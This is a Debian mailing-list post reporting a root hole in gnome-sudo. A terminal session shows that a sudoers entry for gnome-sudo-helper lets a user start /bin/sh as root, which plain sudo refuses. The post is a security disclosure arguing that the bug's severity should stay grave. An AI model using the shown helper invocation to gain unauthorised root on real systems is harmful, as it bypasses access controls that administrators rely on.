If you care about debian's security read this
Hello,
gnome-sudo and configlet's maintainers are trying to let a root hole
go in woody
I've reported a grave bug on gnome-sudo because it will let you run
anything as root when you configure it to be useful, even if you don't
have ways of doing that with normal sudo... see this:
[/etc]
[root]@[couve] # cat sudoers
# User privilege specification
root ALL=(ALL) ALL
kov ALL = (root) NOPASSWD: /usr/sbin/chroot, /usr/sbin/pbuilder, /usr/lib/gnome-sudo/gnome-sudo-helper, PASSWD: /usr/bin/apt-get
[/etc]
[root]@[couve] # exit
[/etc]
[kov]@[couve] $ sudo /usr/lib/gnome-sudo/gnome-sudo-helper /tmp/a \ /bin/sh
GNOME_SUDO_DONE sh-2.05a# whoami
root
sh-2.05a# exit
[/etc]
[kov]@[couve] $ sudo /bin/sh
Password:
Sorry, user kov is not allowed to execute '/bin/sh' as root on couve.horta.
[/etc]
[kov]@[couve] $ gnome-sudo ls /
bin cdrom floppy lib opt sbin usr vmlinuz.old
boot dev hda6 lost+found proc scratch var
cdr etc home mnt root tmp vmlinuz
now I remove gnome-sudo-helper from my /etc/sudoers:
[/etc]
[kov]@[couve] $ sudo /usr/lib/gnome-sudo/gnome-sudo-helper /tmp/a /bin/sh
Sorry, user kov is not allowed to execute '/usr/lib/gnome-sudo/gnome-sudo-helper /tmp/a /bin/sh' as root on couve.horta.
[/etc]
[kov]@[couve] $ gnome-sudo ls /
[/etc]
[kov]@[couve] $
no more root hole, but gnome-sudo doesn't work anymore...
(and not even gives an error message... that's why bug
#133402 is related to this problem)
(the lines may be wrapped by my mail client)
the only way to use gnome-sudo is adding /usr/lib/gnome-sudo/gnome-sudo-helper to /etc/sudoers... and the
problem here is bigger, because the program/instalation does not
warn the user that he has a root hole after being able to use gnome-sudo
details in bug #134521, which was grave but has just being reseverited
'wishlist' by configlets' maintainer.. sorry for bringing this to -devel
but the package's maintainer just doesn't care about this...
[]s!
--
kov@debian.org: Gustavo Noronha <http://www.metainfo.org/kov>
Debian: <http://www.debian.org> * <http://debian-br.cipsga.org.br>
Reply to: